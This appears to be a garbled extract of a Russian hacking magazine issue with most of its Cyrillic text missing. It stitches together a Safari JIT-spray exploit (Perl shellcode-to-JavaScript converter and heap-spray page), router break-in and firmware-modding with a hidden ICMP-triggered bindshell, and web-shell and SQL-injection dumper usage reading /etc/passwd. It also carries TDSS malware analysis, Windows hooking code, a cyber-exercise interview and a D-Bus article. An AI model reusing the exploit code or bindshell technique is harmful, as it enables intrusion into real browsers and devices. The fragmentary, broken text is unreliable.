,
, , .
( ). vtable
. ,
EIP:
var a = parent; //
var buf = make_buf(unescape('%u0101%u0101'), 63000);
a.prompt(alert);
// 0x01010101
a.prompt(buf);
a.close();
//
// promt() = 0x01010101
a.prompt(alert);

Y, JavaScript
XOR, ,
JIT-, , , jit_():
. . .
04450432 81F033333333 XOR EAX, 33333333
04450438 894708 MOV [EDI+8], EAX
0445043B 8B4708 MOV EAX, [EDI+8]
0445043E 8B570C MOV EDX, [EDI+C]
04450441 83FAFF CMP EDX, -1
04450444 0F8529010000 JNZ 04450573
0445044A 81F044444444 XOR EAX, 44444444
. . .

RWX

,
. ,
.
( ) . ,
. DEP
, . - , ASLR,
. JIT-, .
jit_()
, JIT-.
, ? XOR-
, JIT-

0x0000. , 0xXXYY0000 JIT- .
, 0xXXYY , Heap Spray. ASLR?
0xXXYY ? ASLR ,
Safari
jit_() .
.
99% , ,
0x0606000, 0x07070000 .. (. ). JIT-
0x010000,
, , , N 0x06060000, N+1 0x06070000 .. ,
. ,


0xXXYY0104 JIT-

XOR .
,
, 0x0104
XOR.
0xXXYY0104, XXYY
, 0x0607 0x0808
.. , ASLR .

, 0x07070104,
10- XOR-. ,
XOR 0x01020304,
0x1a1b1c1d, 0x07070104 :
. . .
07070104 0403 ADD AL, 3 ; 10-
07070106 0201 ADD AL, [ECX] ;
-- 12
0707011A 81F01D1C1B1A XOR EAX, 1A1B1C1D ; 11 XOR
. . .

LITTLE-ENDIAN , , 0x0304
-. 0x0201
14EB (EB14 = JMP +0x14), . Flash, ,
,
20 (0x14) ,
. ,
:
..^0x14EB9090^0x14EBCC90^..

:
. . .
07070104 90 NOP
07070105 90 NOP
07070106 EB14 JMP 0707011C
- 14
0707011C 90 NOP
0707011D CC INT3
0707011E EB14 JMP
. . .

,
, . , DEP
...


RWX c JIT-

JIT-

,
XOR JavaScript.
, .
Flash - ,
. , ,
JIT SPRAY Flash
Safari . Flash R-X ( ), Safari RWX,
.
, , , . : RWX , , JIT- 07070000.
.
MOV
[ECX], EAX (0x8901 -). ECX 0x07080000, EAX
, RWX- (W ).
-
EAX, 0x0708000
, .
JMP ECX (0xFFE1 ) ,
.


. ,
. MOV REG, VALUE 5 .

. MOV AL, 01 (0xB001) MOV
AH, 02 (0xB402), EAX 0x0201,
0xXXYY0201. ? ,
SHL EAX, 1 (0xD1E0). ECX- , ,
,
...
.
. , , ,
, - JIT-,
. , 0x10000 , ,
: N
0x06060000, N+1 0x06080000 (
0x06070000). , JIT SPRAY
. ,
50%. ,

JIT-.

Metasploit

. . , ,
. 0x0000ABCD*0x10000=0xABCD0000.
, JIT-, ECX EAX,
ECX EAX. ECX
EAX .

,
:

,
JIT-.
! Perl.
, .
, -, JIT- .
-, . ,
Perl, $shellcode.
, .
0x080A0000. ,
:
#Address with RWX - place for shellcode
$addr="\x08\x0A"; #0x080A0000

, ,
4. 1, 2 3, :
$len=length($shellcode);
$add=$len % 4;
for($i=0;$i<$add;$i++)
{
$shellcode.="\xCC";
}

, ; , , 0xXXYY0104 , ,
JIT- .
:
$offsetJit="\"0x22222222^\"+/* START OF OFFSET */\n".
-------- 7 ----------"\"0x22222222^\"+ /*SHELLCODE BEGINS*/\n";

$initJit="\"0x14EBC031^\"+//XOR EAX,EAX\n".
"\"0x14EB01B4^\"+\n".
"\"0x14EB00B0^\"+\n".
"\"0x14EBE0F7^\"+// EAX=0x100*0x100\n".
"\"0x14EBF08B^\"+// MOV ESI, EAX ;ESI=00010000 - MUL factor\n".

, . , XOR 0x14EBC031
. EIP 0x07070104, 0x31C0EB14.
0x310 XOR EAX, EAX. ,
0xEB14 JMP +14
0x14EB01B4. , MOV AH, 01 / JMP
14. , AH ,
, AL. ,
EAX=00000100. MUL EAX,
0x100 0x100 EAX 0x00010000.
,
EAX ESI. ESI .
, ECX ,
. $addr.
sprintf("\"0x14EB%02lxB4^\"+\n",ord
substr($addr,0,1)).
sprintf("\"0x14EB%02lxB0^\"+\n",ord
substr($addr,1,1)).

,
$addr AH AL. , EAX =
0001080A. , .
EAX ECX:
"\"0x14EBE6F7^\"+ // MUL ESI; EAX - RWX memory for shellcode\n".
"\"0x14EBC88B^\"+ // mov ecx, eax ; ECX - pointer on RWE mem\n".

, 0xEB14 ,
. ECX 080A0000,
EBX :
"\"0x14EBDB33^\"+ // xor ebx, ebx\n".

, XOR JavaScript, +,
JavaScript. eval() ,
JavaScript , .
. ESI 0x10000

"\"0x14EB04B3^\"+ // mov bl, 4

; EBX = 0x4 - step \n";

. ECX ,
, ESI , EBX
. .
.


HTML JavaScript,

#Convert shellcode into JIT code


for($i=0; $i<length($shellcode); $i+=4)
{
my $val="";
$byte1=substr($shellcode,($i+3),1);
$byte2=substr($shellcode,($i+2),1);
$byte3=substr($shellcode,($i+1),1);
$byte4=substr($shellcode,($i),1);

, $byteX.
EAX:
$val.="\"0x14EBC031^\"+ //XOR EAX,EAX\n";

$val.= sprintf("\"0x14EB%02lxB4^\"+ //MOV AH\n",ord $byte1);


$val.= sprintf("\"0x14EB%02lxB0^\"+ //MOV AL\n",ord $byte2);
$val.= "\"0x14EBE6F7^\"+ //MUL ESI\n";

$val.= sprintf("\"0x14EB%02lxB4^\"+ //MOV AH\n",ord $byte3);


$val.= sprintf("\"0x14EB%02lxB0^\"+ //MOV AL\n",ord $byte4);

EAX, $byte1 AH, $byte2 AL.


MUL ESI, , EAX=EAX*ESI. ESI
, , $byte1 $byte2


EAX.
EAX ( AH AL) $byte3 $byte4.
EAX . :
$val.="\"0x14EB0189^\"+ // mov [ecx], eax ;\n.
"\"0x14EBCB03^\"+ // add ecx, ebx\n;
$copyJit.=$val;

ECX (0x080A0000)
. ECX EBX, .
, 4 ,
EAX , ECX ,
. ( $copyJit) 0x080A0000 (
$addr). :
$jumJit="\"0x14EB00B5^\"+ // mov ch, 00\n".
"\"0x14EB00B1^\"+ // mov cl, 00 ;\n".
"\"0x14EBE1FF^\"+ // JMP ECX ; PROFIT! \n";

ECX (CH CL), ECX


0x080A0000, JMP ECX,

VUPEN $$$.
ECX, , ,
. , $page HTML-
:
$page="
<script>
function make_buf(payload, len) {
while(payload.length < (len * 4))
payload += payload;
payload = payload.substring(0, len);
return payload;
}
function fff()
{
var a = parent;
var buf = make_buf(unescape('%u0104%u0707'),
68000);
a.prompt(alert);
a.prompt(buf);
a.close();
a.prompt(alert);
}

JavaScript- :
var SPRAY=\"\";
var JIT=\"{ \"+
\"var y=(\";

, .
, SPRAY JIT. JIT
Y.
$page JIT-: $offsetJi
t.$initJit.$copyJit.$jumJit.
Y JavaScript JIT-,
Perl. ,
$endPage:
$endPage="\"0x14ebcccc\"+
\");\"+
\"return y; }\";

return y;,
. , ASLR,
:
var zl=\"zlo_\";
for (var i=1;i<800;i++)
{
SPRAY+=\"function \"+zl+i+\"()\"+JIT+\"
\"+zl+i+\"();\";
}

JavaScript SPRAY 800


zlo_X() . X
. ,
... ,
eval():
eval(SPRAY);
fff();
</script>

eval(),
, fff()
, EIP 0x007070104, ,
0x080A0000
. JIT SPRAY
6 10 .

, JIT-
. ,
, ,
.


JIT SPRAY.
,
. , VUPEN
JIT SPRAY Safari 0day-
. ,
JIT- Safari Mac OS
iPhone/iPad, , ,
, . z



HellMilitia my Death

Broadcom



DLINK 2500U

.
,
, D-Link 2500U. , ,
Wake-up bindshell'a
, Broadcom.
, ,
500T , ,
.
, nmap:
$ nmap -A 192.168.1.1
Nmap scan report for 192.168.1.1
Host is up (0.026s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE
23/tcp open  telnet
80/tcp open  http

, telnet ssh, ...


, . UDP-,
, - :
# nmap -sU 192.168.1.1
Nmap scan report for 192.168.1.1
Host is up (0.00096s latency).
Not shown: 997 closed ports
PORT   STATE         SERVICE
53/udp open          domain
67/udp open|filtered dhcps
69/udp open|filtered tftp
MAC Address: 00:26:5A:74:70:79 (D-Link)

tftp; , , , .

:
$ telnet 192.168.1.1
Trying 192.168.1.1...
Connected to 192.168.1.1.
Escape character is '^]'.
BCM96332 ADSL Router
Login: admin
Password: admin

BusyBox,
. ,
BCM Broadcom!
(), .
shell ... , , ,
, , , . cd, ls dir
, . , help`e
echo /,
, , (//
) , .
ls , cd?
sh, ... ! BusyBox, , help,
cd! ,
2 shell'... , , ,
- .
:
# echo *
bin dev etc lib linuxrc mnt proc sbin usr var webs

, linuxrc ( ,
BusyBox) webs ( ,
-). GNU\Linux:
# cat /proc/version
Linux version 2.6.8.1 (jenny@BS5) (gcc version 3.4.2)
#1 Wed Mar 4 21:10:17 CST 2009

. ,
2.6, ,
( 2.6 , 2.4,
, - ). :
# cat /etc/versions
MODEL=DSL-2500U

VERSION=RU_1.50
BCM_VERSION=3.10L.01.
Revision=5317
FSSTAMP=20090304211235


, -
, , ,
. FTP-
2500U,
.
:
# cat /proc/cpuinfo
system type : 96332
processor : 0
cpu model : BCM6338 V1.0
BogoMIPS : 239.20
wait instruction : no
microsecond timers : yes
tlb_entries : 32
extra interrupt vector : yes
hardware watchpoint : no
unaligned access : 8407352
VCED exceptions : not available
VCEI exceptions : not available

, Broadcom 96338. : Netgear, Asus ..,


(,
-
shell'e, , shell ),
. 280D MIPS,
200MHz (, ). :
# cat /proc/mounts
rootfs / rootfs rw 0 0
/dev/root / squashfs ro 0 0
/proc /proc proc rw,nodiratime 0 0
tmpfs /var tmpfs rw 0 0
# cat /proc/mtd
dev: size erasesize name
mtd0: 00153000 00001000 "Physically mapped flash"
# cat /proc/meminfo
MemTotal: 6108 kB
MemFree: 428 kB
---8<---

SquashFs
LZMA, ,
. Flash-
, , - 2 . 6 , .
.
, CFM (Common Firmware Manager), , . Telnet


: bcmtag(256) +
CFE(62380) = 62636,
(62636) + (1474560).
$ hexdump -C -n 64 -s 62636 firmware.img

SquashFs sqsh, , .

dd:
$ dd if=firmware.img of=fs.img bs=1 skip=62636 count=1474560

, ,
. :
pvc2684d , ADSL, PVC (Permanent Virtual Circuit).
sntp .
snmpd ,
SNMP (Simple Network Management Protocol).
syslogd ,
. , , : ,
.


, /dev/ac97 (AC97
)...

. , : ?. , 500T:
wget, ...
nmap' tftp-
. tftp,
:
$ tftp
tftp> connect 192.168.1.1
tftp> mode binary
tftp> put firmware.img

,
:
, , , , .
, .
, .
bcmTag.h . , , , ,
GNU/Linux
SquashFs. 265 ,
, ,
.
$ hexdump -C -n 256 firmware.img


, - man dd. .
,
LZMA.
$ mkdir unpacked_fs
$ usquashfs fs.img

, ,
, , telnet ssh (
), BusyBox... :
$ mksquashfs unpacked_fs modifed_fs.img -noappend

.

. , :
$ dd if=firmware.img of=before.img bs=1 count=62636
$ dd if=firmware.img of=after.img bs=1 skip=1537196

(62636) + (1474560).
:
$ mv before.img modifed_firmware.img
$ dd if=modifed_fs.img of=modifed_firmware.img bs=1 seek=62636
$ dd if=after.img of=modifed_firmware.img bs=1 seek=1474560

, : totalImageLen, rootfsLen, kernelAddress,


imageValidationToken ( dword) tagValidationToken. .
totalImageLen: du -b modifed_firmware.img.
rootfsLen imageValidationToken: cksum -b modifed_fs.img
kernelAddress: oldKernelAddress + (modified_rootfsLen old_rootfsLen).
, , tagValidationToken:
$ dd if=modifed_firmware.img of=modified_tag.img bs=1 count=256
$ cksum tag.img
, - ! , ,
, . ,
. , ,
, .
FTP-, .

.

. toolchain' (*uclibc_crosstools*),
, GNU/Linux.
, :
$ mkdir dlink_firmware
$ tar xvfz *consumer.tar.gz -C dlink_firmware

consumer_install :
$ cd bcm_963xx_router
$ make PROFILE=96332CG

PROFILE ,
. Compile.
pdf FTP .
. ,
,
. ! ,
, ,
. , .
, - :

$ wget http://admin:admin@192.168.1.1/backupsettings.conf

TFTP- :
# tftp -g -f backupsettings.conf -t c 192.168.1.2

TFTP-,
backupsettings.conf. , , :).

, ,
. , 500,
. CFE (Common
Firmware Environment), Reset ,
20 , . , HTTP ,
. (
), ,
, JTAG-. ,
(,
), .

. ,
AV-, .

! AV , , , .
, .
,
, , .
endian, :
MIPS-, , ,
(big endian, little endian). ,
, GNU\Linux. : .
: , , export (
, /etc/init.d/rcS), fork()
, . ,
, , export
( ), , export. ,
, bindshell.

. Wakeup-bindshell,
. , ,
: , ICMP ( , IP),
(icmp.icmp_id) 0xDEAD ( ,
). , bindshell , , ,
, . : ,
ICMP-,
bindshell ICMP-
icmp.icmp.id 0xDEAD. (31337, ).
wakeup DVD.
,
. , LKM,
-, ... ,
.

,
, (
: ?,
), . ,
iptables ( ). ,
, . , iptables ,
(ssh) IP-
! , ,
, .
, ,
. ,
; ,

. ,
( ).
, ,
( , ), , , , ,
.

,
, , ,
.
,
! z



icq 884888

X-TOOLS

: GetEngine
:*nix/win
: elwaux

-
.
:

, ,
rdot.org/forum
.


,
.

base.getEngine, 70 .

:
./ge.pl site.com #
./ge.pl site.com -debug #

./ge.pl -update #

:
./ge.pl rdot.org/forum/
GetEngine v0.1
eLwaux(c)2009
Found Engine: vBulletin
version 3.8.5 (clientscript/vbulletin_global.js)


https://rdot.org/forum/showthread.php?t=146.

: [S]Hell Wizard 4.3


: *nix/win
: Dr.Z3r0

rDot [S]
Hell Wizard.



-
.


MySQL- ,

.
,
-,
DDoS-,
(
set_time_limit, ignore_user_abort
) PHP,
.

.

( )
:
http://www.site.com/path/shell.php
http://www.site2.com/path/shell.
php
http://www.site3.com/path/shell.
php?basic_user=[user]&basic_
pass=[pass] # BasicAuth

,

, ,
:
PR ;
( :
r57, c99 );
(, -);
PHP (safemode, open_
base_dir, set_time_limit, ignore_
user_abort,
socket);

;
.

;

-;
BasicAuth ;
PR ;

;
;
Reverse ip ,
;
HTML-
;
DDoS;

(r57, c99 );
(SQL- ).



https://rdot.org/forum/showthread.php?t=136.

: SQLmap
: *nix/win
: inquis, stamparm


SQLmap

SQL-.
:
*nix- Windows;
MySQL, MS SQL,
PostgreSQL, Oracle;

SQL-:
, blind UNION ( time based
);
;

(MySQL
PostgreSQL user-defined , Microsoft SQL Server
xp_cmdshell());

blind SQL-

SQLmap
,
;
HTTP Basic, Digest, NTLM
Certificate ;
(, ,
);
,
;
, ,
;
;
SQL-;

(
);

;
Metasploit
w3af;
;

, ;
;
;
GET
POST;

CHAR() ( magic_quotes);

.

, , http://test.com/test.php?id=1.
SQLmap :
sqlmap -u "http://test.com/test.php?id=1" -b -v 1

:
sqlmap/0.8 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[*] starting at: 04:53:42
...
web application technology: Apache 2.0.63, PHP 5.2.5
back-end DBMS operating system: None
back-end DBMS: MySQL 5
[04:53:43] [INFO] fetching banner
[04:53:43] [INFO] the back-end DBMS operating system is None
banner: '5.0.90-community'
[04:53:43] [INFO] Fetched data logged to text files under '/src/sqlmap/output/blindcanadians.ca'
[*] shutting down at: 04:53:43


:
: Apache 2.0.63
: PHP 5.2.5
: MySQL 5
(5.0.90-community)


sqlmap.
sourceforge.net.

: DirBuster
: *nix/win
: James Fisher, John Anderson,
Subere, Richard Dean

OWASP .
Java- DirBuster,

. :

( 6000 );
HTTPS HTTP;
,
;

;
,
;
,
;
;
HTTP-;
;
- HEAD-
GET-;
HTML-;

;
Basic, Digest NTLM ;
GUI ;

, Java.





.
owasp.org/index.php/Category:OWASP_DirBuster_Project.

: Blind SQL Injection


Dumper v1.1
: *nix/win
: Shadow


- Blind SQL Injection
Shadow,
Qwazar' (https://forum.antichat.ru/showpost.
php?p=1494443&postcount=11).
:
BlindSQLiDumper.exe [full path whith
vuln param] -[q,f [param]] [file
out(default result.txt)]

:
q ["sql query to unlimit repeat"]
, , LIMIT
( SQL- -
, LIMIT,
);
f ["full path to filename for download"]
( Qwazar'
64 ),
, ,
.
:
BlindSQLiDumper.exe test.com /
forum/index.php?id=-123' -q "select
table_name from information_schema.
tables" tables.txt

:
BlindSQLiDumper.exe test.com /
forum/index.php?id=-123' -f /etc/
passwd passwd


, , https://rdot.org/forum/showthread.php?t=143. z


MALWARE
,

TDSS


:

TDSS. , TDSS
, ,

.
TDSS . - . , ,
,
.
east.*****.
pu.ru. (. ).

O
HTML-

- Small Http Server,


, , WireShark
.
MalZilla.

.
Trojan-Downloader.JS.Pegel.g, -,
JavaScript.
<iframe src = , ,
-. ,
WireShark Content-Length 2.

Trojan-Downloader.JS.Pegel.g

( )
Exploit.Script.Generic.
JavaScript, . , , , , %, unescape
document.write.

Virus.Win32.Sality.ag.
MS06-014
.

n

, HTML-. ,
.



Exploit.Script.Generic
,
PHP-,
, PHP- . base64,
POST, , .

Twitter.
JSON- :

Exploit.JS.Pdfka.bwb, JavaScript-
.
.
, ,
.
,
.

<script src='http://search.twitter.com/trends/daily.json?callback=callback'>
, ,
callback=. ,
callback,
.

daily.json, twitter.com

,
302 Moved Temporarily, location
121.101.***.203. , . ,
PE-, Packed.Win32.Krap.x. ,
Windows,
.
PDF-,
Adobe Reader, Java-,
MS06-014.

Packed.Win32.Krap.x,
, , TDSS.

IDA. Hiew
.
FakeApi ,
. .
ROL SHR.

Trojan-Downloader.JS.Timul,
Windows
PDF, Krap.x. - , , Hiew, JavaScript .
Adobe Reader,
. ,
Krap.x.
XOR 0x99.


Packed.Win32.Krap.x,


MALWARE

, Trojan.Win32.TDSS
, .
, , .
Packed.Win32.
Krap.x, . ,
TDSS
.


Hiew. ~0x1000, (~0x60000 )
. , , (VirtualProtect, GetTempPathA, GetModuleHandle
Kernel32.dll), ,
GetDlgCtrlId, GetParent user32.dll.
.

: H, ., f.
LEA, CS,
.
, , , LEA AX, CS:[EAX + 0]; LEA AX, [EAX + 0];
LEA AX, [EAX] .

Trojan.Win32.Tdss
.
GetDlgCtrlID GetParent FS: .
LastErrorValue
Windows TEB. .
SpareBool PEB.
.

. RC4.
0x0 0x100 SpareBool, . PETools , .
, MSVC
, .
, , TDSS . , , ,
. .


Trojan.Win32.Tdss,
, ,
NOP. , ~25%
. ,
, , ,
inc reg add reg, 4.

,
JMP .



FakeApi

. ,
.
,

( ):

Malwarebytes' Anti-Malware_is1; NOD32; Agnitum Outpost


Security Suite Pro_is1; Avira AntiVir Desktop; avast!; AntiVir
PersonalEdition Classic; Sophos; Sophos Client Firewall; Sophos
Antivirus; Kaspersky 2010; Kaspersky 2008; F-Secure Web Filter.

:
.
( ,
), , .
, TDSS
,
. ,
, TDSS,
..z

MALWARE
stannic.man@gmail.com

HookFAQ:
hard version



?
? ,
, , (
,
. )!
RTFM

(hook , .)? ,
.
Microsoft

,
.
: SetWindowsHook(Ex),
UnhookWindowsHook(Ex) CallNextHook(Ex).

, .
,
,
. ,
,
.


.
Windows -,
,
, (,
).
.

, Windows , ,
,
,
.

,
.
, , . exe-,
. -

,
,

.
-,

- ,



.
, , /
,
.
,




rku

. ,

,
, ,
, , ..
SetWindowsHook? .
, .
.


-. ,
, ,
. GetProcAddress :
GetProcAddress(GetModuleHandle("ntdll.dll"),
"CsrNewThread").

, ,
, ntdll.dll, kernel32.dll (kernelbase.dll Windows7)
advapi32.dll.
-, --
:
int MyNewFunction(void *param1,
int param2, bool param3)
{
return OriginalFunction(param1,
param2, param3);
}


OriginalFunction , MyNewFunction.
, -
OriginalFunction, - MyNewFunction,
.
, , 8 10.
,
. ? ,
, , ,
, .
. , :
?
.
,
, ,
.
, . ,
- , , -,
, -, .

IAT -
:).
. , .
, jmp
.
jmp, .
,

.
:
, , . ,
,
. , , -, ,
, -
.
, ,
,
.
, .

IAT, EAT

: , ,
? , ,
Import Address Table (IAT).
, . DLL,
, , IMAGE_IMPORT_DESCRIPTOR.
DLL, ,
IMAGE_IMPORT_BY_
NAME. IMAGE_IMPORT_BY_NAME
, .

, IMAGE_IMPORT_DESCRIPTOR
DLL .
DLL (mapped),

IMAGE_IMPORT_BY_
NAME .
hook- , PE

DVD
dvd


,
, ,

.

HTTP://WWW
links
http://vx.netlux.org

,

.
Must visit,
.


MALWARE

,
.
IAT -

IAT
hook-. ,
, hook-
. , , ...
Export Address Table (EAT), , , Dll,
.

STELTH-: ,

,
,
. ? , .
. , , . ,
, - . . , , ,
,
, . , ,
, . GetThreadContext/
SetThreadContext. -
(Breakpoints) .
, :
DR0 - DR3
. ,
;
DR4 - DR5 i486 ;
DR6 . , ( 1).
, ;
DR7 , .
, ,
(hardware breakpoint, int 1) ,
(single step
exception) , :

int SetDebugBreak(FARPROC address)
{
    int status = -1;
    HANDLE thSnap = CreateToolhelp32Snapshot(
        TH32CS_SNAPTHREAD, NULL);
    THREADENTRY32 te;
    te.dwSize = sizeof(THREADENTRY32);
    Thread32First(thSnap, &te);
    do
    {
        if(te.th32OwnerProcessID != GetCurrentProcessId())
            continue;

        HANDLE hThread = OpenThread(
            THREAD_ALL_ACCESS, FALSE, te.th32ThreadID);

        CONTEXT ctx;
        ctx.ContextFlags = CONTEXT_DEBUG_REGISTERS;
        GetThreadContext(hThread, &ctx);
        if(!ctx.Dr0)
        {
            ctx.Dr0 = MakePtr( ULONG, address, 0);
            ctx.Dr7 |= 0x00000001;
            status = 0;
        }
        else if(!ctx.Dr1)
        {
            ctx.Dr1 = MakePtr( ULONG, address, 0);
            ctx.Dr7 |= 0x00000004;
            status = 1;
        }
        else if(!ctx.Dr2)
        {
            ctx.Dr2 = MakePtr( ULONG, address, 0);
            ctx.Dr7 |= 0x00000010;
            status = 2;
        }
        else if(!ctx.Dr3)
        {
            ctx.Dr3 = MakePtr( ULONG, address, 0);
            ctx.Dr7 |= 0x00000040;
            status = 3;
        }
        else
            status = -1;

        ctx.ContextFlags = CONTEXT_DEBUG_REGISTERS;
        SetThreadContext(hThread, &ctx);
        CloseHandle(hThread);
    }
    while(Thread32Next(thSnap, &te));
    return status;
}

AddVectoredExceptionHandler(0, (PVECTORED_EXCEPTION_HANDLER)DebugHookHandler),
EXCEPTION_SINGLE_STEP.

. ,


, . , .
! z


Mifrill mifrill@real.xakep.ru

,
,
? ,
!

, ,

. ,
,
.

, ,
,
,
.
,
,
.
,
, ,
. ,
,
.
, , -
-
. , ,

,
.
, ,
.
,


. ,


,
. ,

.
-

FORWARD DEFENSE,
.
,
.
,


.
, , ,
.
, , ,
.
,
.

.
,
,

,
,

. , , ,
,
.
( )

,

(
). ,

Cyber Defense Exercise,
10- .

CYBER DEFENSE EXERCISE

Cyber Defense
Exercise (CDX)


. CDX
IT-. , ,
,
.
,
,
,
, - (United
States Naval Academy),
.
, ,
-
. , ,
, .
M.: , , ,
?
, -?
..: ,

(
. ,



.
Red Team , - .
, .

, :
White Cell , .
Blue Cell(s) () .
Red Cell .
Gray Cells -.

.

.
. Mifrill). !
, , , 10- .
. ,
. ,

.
.: 10- ?
..: 10th Fleet... , United States Fleet Cyber Command.
- , Navy .
, ,
, :).

- ,
. C 10-
.
.: ,
, Cyber Defense
Exercise
,
?
..: ? , ? , . .
().
.: , ,
. , ?
..: CDX .

,
hostile
environment ( ).
,
.

. ,
Gray Cell .
, ,
.

50 000 , ,
- , -
. , e-mail
, .
, ,
,
. ,
, .
.: , ?
..: , :
US Military Academy (West Point), US Naval
Academy, US Airforce Academy, US Coast
Guard Academy, Royal Military College of
Canada, US Airforce Institute of Technology


, . CDX

.
:)
(2 ), Naval Postgraduate School, US
Merchant Marine Academy.
IT-, .
,
, .

. , Coast Guard

.
, ,
,
. , , 38
, ,
9.
.:
, ,
?
..: ,
, CDX
, ,
,
:). ,
VoIP- US Coast
Guard Academy. , ,
, ,
-
, .
(


, , ,
). ,
West Point

,
,
CDX
. ,
, ,
West Point Coast
Guard, ,
. ,
.
.: , ?
..: ,
, , (
), .
- .
-
,
.

,
.
,
.
:
- +
.

: IP-,
,

AIM-, .
,
, .
VoIP- VoIP- , , .
.
.
, ,
. , ,
, .
.: ?
..: ,
5000 . .
.
, VPN .

.
, , , ,
,
, ,
:).
,
, , ,
.
,
. ,
.
, VPN,
. ,

VMWare,
.
,
: (node) 200 . 100 ,
100 , 50
, 100
.
, . , .
.: ? ,
- ?
..: .
, open source. - ,
IT-, . ,

. , ,
.
, .
, ,
.
, 200 .
, CentOS. 100 . IP tables 100
. WireShark 100 . -
100 .
,
, ,
.
,
,
.
,
, ,
.
.: ?

..: , . VPN,
, ,
...

, .
:
Red Time 08.00-16.00, ,
Gray Cell, .
White Time 06.00-08.00, 16.00-22.00,

, ,
.
,
Downtime (),
. , ,
, .
, 16.00.

US
Airforce Institute of Technology,
IT-, 1 16

.

..: , !
,
, ,
RAdmin .
, RAdmin -,
, .
.
.:
, ?
,
- ?
..: . -
, .
plausible deniability... ,
- , ,
,
, , ,
!.
:).
, , , , .
Rainbow Tables ?
.
. Metasploit? ,
.
BackTrack...
.
.: , , , . ,
Cyber Defense
Exercise.

Black Time 22.00-06.00,


, .

, ,

,
.
(
),
. ,
,
, . .


.
.: ,
?
..: , .
DoS.
,
.
,
.
.: (Grey
cell),
, ,
?
..: , . ,
! Gray cell
, .


, .
, .
,
,
,
.

,
. , e-mail,
, ,
, .pdf
- ,
.
,
. , ,
, ,
, ,
. , ,
, .
-
,
.
.: , ? ?
..: , . Red
Team. :).
( :
Red cell 40
.
Red Team,

, , ,
,


.)
.
, ,
. - . .
,
, , ,
VoIP. ,
, 10
,
.
, -
.
,
.
- ,
Gray cell ,
-
. , ... ,

IP,
- .



! ,
. ,
, . : 16 ,
. ,


, ,

. , -

,
.
.: , ?
:)
..: .
US Airforce Institute of Technology,

IT-, 1
16. ,

( ). : ,
,
, .
. , ,
,
, , ,


IT- - . -
, .

, ,
... .
Airforce Institute of Technology
,
, ,
BackTrack .
.: ,
, ,
?
-
, for
lulz?
..: . ,


, .
.
, , ,
. , ,
,
- .
5 ,
,
, .
,
. , , Washington
post. z

UNIXOID
dhsilabs@mail.ru

-Bus

D-Bus

D-Bus,
Linux-
.
D-Bus,
.
D-BUS
, ,
, D-Bus, . ,
. .
,
D-Bus,
.
D-Bus ,
,

. ,
D-Bus /
Network Manager';
IM- ,


;
;
scale;
USB- (
, HAL + D-Bus + pmount) ..
, D-Bus
(KDE, GNOME, Xfce), .
D-Bus
. ,
.
,
D-Bus,

. , ,
, ,

.

.
,
, .

, D-Bus , ,
, .

.
,
Glib, Qt Java.
D-Bus .
.


, , 30 ?
:

qdbus org.kde.yakuake
, ,
.
.
.

.
D-Bus
, D-Bus .

.
D-Bus . , , org/kde/
kspread/sheets/1/cells/1/1. -
. , 1:1
KSpread. , , /com/appl1/c5444sf956a.
.
, .

D-BUS
, D-Bus
.
:
$ qdbus org.kde.krunner /ScreenSaver Lock

, . . , KDE
, D-Bus,
:
$ qdbus org.kde.krunner /ScreenSaver \
SimulateUserActivity

, X-
. , :
$ xset dpms 0 0 0

0
, 0
, .
, xset xorg.conf,
, ,
- xset.
SimulateUserActivity. ,
, .
.

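#!/bin/bash
# Run the given command in the background and simulate user activity
# every 30 seconds for as long as it is still running
"$@" &
while jobs | grep -q Running
do
qdbus org.kde.krunner /ScreenSaver \
SimulateUserActivity
sleep 30
done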

. ,
,
.
/usr/bin/simulate.
:
$ sudo chmod +x /usr/bin/simulate
$ simulate mplayer film.avi

, MPlayer '-stopxscreensaver',
.


Windows
FlashGet. ,
. ,
, .

Linux D-Bus.
:
$ qdbus org.kde.klipper /klipper \
getClipboardContents

, , URL (
http://):
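#!/bin/bash
# Poll the Klipper clipboard once a second and print its contents
# whenever they start with http://
while true
do
if qdbus org.kde.klipper /klipper \
getClipboardContents | egrep -q '^(http://)'
then
qdbus org.kde.klipper /klipper \
getClipboardContents
fi
sleep 1
done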

. (
<Ctrl+C>, ),
.
URL (, http://),
,
. , :

INFO

info
D-Bus



GLib, GCJ (Java),
Mono, Qt Python.
KDE4
D-Bus.

,
,

.


,

,
D-Bus
.

WARNING
warning

dbus: UUID file /var/lib/dbus/machine-id contains invalid hex data,

:
$ dbus-uuidgen > /var/lib/dbus/machine-id

HTTP://WWW
links
www.freedesktop.org D-Bus
dbus.freedesktop.org/doc/dbus-tutorial.html
D-Bus
xmms2.org/wiki/MPRIS#D-Bus
XMMS-2 D-Bus
dkws.org.ua

then
in='qdbus org.kde.klipper /klipper \
getClipboardContents'


UNIXOID

dbus-send --type=method_call --dest=org.kde.amarok \


/Player org.freedesktop.MediaPlayer.Stop
sleep 5
dbus-send --type=method_call --dest=org.kde.amarok \
/Player org.freedesktop.MediaPlayer.Play

:
$ qdbus org.kde.amarok /Player GetMetadata

/yakuake/sessions

GetStatus, 4 :
: 0 , 1 , 2 ;
: 0 , 1
;
: 0 , 1 ;
: 0 ,
, 1 .


VLC XMMS
wget $in
fi

in,
wget, .
, . , FTP-. -,
URL ,
, http://server/file,
. (FlashGet ,
-, URL), URL,
wget. , D-Bus
, .
getClipboardContents setClipboardContents,
.
:

if qdbus org.kde.klipper /klipper getClipboardContents | \
egrep -q '^(http://)'
then
qdbus org.kde.klipper /klipper setClipboardContents \
" URL "


AMAROK 2 D-BUS
Play, Pause, Next,
Prev, Stop, Quit:
$ dbus-send --type=method_call --dest=org.kde.amarok \
/Player org.freedesktop.MediaPlayer.Play
$ dbus-send --type=method_call --dest=org.kde.amarok \
/Player org.freedesktop.MediaPlayer.Pause
...
$ dbus-send --type=method_call --dest=org.kde.amarok \
/ org.freedesktop.MediaPlayer.Quit

VLC.
, :
$ dbus-send --print-reply --session --dest=org.mpris.vlc \
/Player org.freedesktop.MediaPlayer.Play

Linux, - XMMS.
Winamp.
D-Bus XMMS
(XMMS 2): http://xmms2.org/wiki/MPRIS#D-Bus.
XMMS 2, .

ORG.FREEDESKTOP.
MEDIAPLAYER (MPRIS 1.0 DBUS API)
, Amarok, VLC, XMMS, Audacious,
BMPx, MPRIS. ,
, . dbus-send
'--dest' :
$ dbus-send --type=method_call --dest= \
/Player org.freedesktop.MediaPlayer.Play

.
org.freedesktop.MediaPlayer /Player. /TrackList.


VolumeSet:
$ dbus-send --type=method_call --dest= \
